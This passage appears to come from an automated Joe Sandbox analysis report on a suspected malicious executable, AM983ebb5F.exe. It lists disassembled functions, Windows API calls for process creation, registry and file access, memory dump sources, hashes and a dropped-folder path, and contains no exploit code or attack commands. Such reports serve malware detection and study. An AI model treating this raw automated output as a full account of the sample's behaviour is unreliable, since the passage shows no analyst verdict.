                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction ID: 78408803ccc59d93ae5352641a5e7b8f709900c8df5e8e9e13d69f82a1dcf02f
                                                                                    • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                    • Instruction Fuzzy Hash: 8FE08C3220021ABBCF109E908C00EEB3FACEB003A0F014432FA26E6050D670E83097A4
                                                                                    Function 004023F9 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040242A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: PrivateProfileString
                                                                                    • String ID:
                                                                                    • API String ID: 1096422788-0
                                                                                    • Opcode ID: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                    • Instruction ID: 816608b18dc0c520cd9a71caba4f9b5dbdb35d60be0fcf423de44464aa3a4457
                                                                                    • Opcode Fuzzy Hash: 979b3f2ec0bc23d324c76cc3db4c1f8da93b0e1d0eaca7bbe8bd823efade59bd
                                                                                    • Instruction Fuzzy Hash: 95E04F31800229BEDB00EFA0CD09DAD3678AF40304F00093EF510BB0D1E7FC49519749
                                                                                    Function 004063C4 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,00406452,?,?,?,?,: Completed,?,00000000), ref: 004063E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: Open
                                                                                    • String ID:
                                                                                    • API String ID: 71445658-0
                                                                                    • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction ID: e31b8ecfa4924c4a0859a1c58e61cb12282203f41ec30ad4fda9f6d7c72ae418
                                                                                    • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                    • Instruction Fuzzy Hash: 68D0123200020DBBDF115E91ED01FAB3B1DAB08310F014426FE16E5091D776D570A764
                                                                                    Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                    • Instruction ID: b7b437a2ec26925c6232407c7e58ab903e49824199ec6a3f71ab3ccdd8f320e3
                                                                                    • Opcode Fuzzy Hash: bd9eef0ddba76f96e5ede74a4073dc30a0544dd5bf06428a66fa2d1577afb889
                                                                                    • Instruction Fuzzy Hash: 81D05B72B08104DBDB01DBE8EA48A9E73B4DB50338B21893BD111F11D0D7B8C545A71D
                                                                                    Function 00404522 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                    • Instruction ID: 7d988476d572be30e71f68111afb2513933db934ea5b2002f3fecefde51a3b0c
                                                                                    • Opcode Fuzzy Hash: 8dc2ea4a8cffd810c80330d43262312fa0f844130cc7d84a637c392e617d0b66
                                                                                    • Instruction Fuzzy Hash: ACC04C717402007BDA209F50AD49F07775467A0702F1494797341E51E0C674E550D61C
                                                                                    Function 0040450B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                    • Instruction ID: 777369a795cbaa9bd4fd16da76cbada5404ff361b75e364c58eeef3f96c31ac9
                                                                                    • Opcode Fuzzy Hash: 5e23afa4ba150cac51e31494d2c9f0ee7f8efb4361c8cf2b7a73957f204a5961
                                                                                    • Instruction Fuzzy Hash: 6BB09235181600AADA115B40DE09F867BA2E7A4701F029438B340640B0CBB210A0DB08
                                                                                    Function 004034EA Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403247,?), ref: 004034F8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                                                    • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                                                    • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                                                    Function 004044F8 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,004042CF), ref: 00404502
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                    • Instruction ID: 186c68f4495094c0cebc3eb7279f68ffc90812dad8dfd9e689695b78415bb769
                                                                                    • Opcode Fuzzy Hash: faa9f1bbc6a73408ed15535010d366895e2d742fa65bef251b9024de670fa5bb
                                                                                    • Instruction Fuzzy Hash: 43A00176544A04ABCE12EB50EF4990ABB62BBA4B01B618879A285514388B325921EB19
                                                                                    Function 00401FA9 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
                                                                                      • Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,antholite,00000000,00424620,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
                                                                                      • Part of subcall function 004055DC: lstrcatW.KERNEL32(antholite,0040341D,0040341D,antholite,00000000,00424620,74DF23A0), ref: 00405637
                                                                                      • Part of subcall function 004055DC: SetWindowTextW.USER32(antholite,antholite), ref: 00405649
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
                                                                                      • Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697
                                                                                      • Part of subcall function 00405B3A: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042FA70,?,?,?, abelsa",?), ref: 00405B63
                                                                                      • Part of subcall function 00405B3A: CloseHandle.KERNEL32(?,?,?, abelsa",?), ref: 00405B70
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                                                      • Part of subcall function 004069F6: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406A07
                                                                                      • Part of subcall function 004069F6: GetExitCodeProcess.KERNEL32(?,?), ref: 00406A29
                                                                                      • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2972824698-0
                                                                                    • Opcode ID: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                    • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                                                    • Opcode Fuzzy Hash: 23aa4ee629d2d375094aa14ebaeeae63623eaa73686822291d3629d93c53ad1e
                                                                                    • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

                                                                                    Non-executed Functions

                                                                                    Function 004049C7 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                                                    • lstrcmpiW.KERNEL32(: Completed,0042CA68,00000000,?,?), ref: 00404B2E
                                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404B3A
                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                                      • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                                      • Part of subcall function 00406805: CharNextW.USER32(?,"C:\Users\user\Desktop\AM983ebb5F.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                                      • Part of subcall function 00406805: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                                      • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                                      • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                                      • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: : Completed$A$C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                    • API String ID: 2624150263-2049196090
                                                                                    • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                    • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                                                    • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                                                    • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                    Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Roaming\erstatningsgraden, xrefs: 0040226E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateInstance
                                                                                    • String ID: C:\Users\user\AppData\Roaming\erstatningsgraden
                                                                                    • API String ID: 542301482-1967000036
                                                                                    • Opcode ID: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                    • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                                                    • Opcode Fuzzy Hash: 54fcaebf65a6d80a769d2ffe25eeb1568fba929b3fba522b5b89cb6b807999ae
                                                                                    • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                                                    Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1798522663.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1798483569.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798545098.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798567104.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1798761669.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AM983ebb5F.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: f7eec81d6910abfa52e209e80917fba1586809f9bcb970d7ef1d97902b1d379f
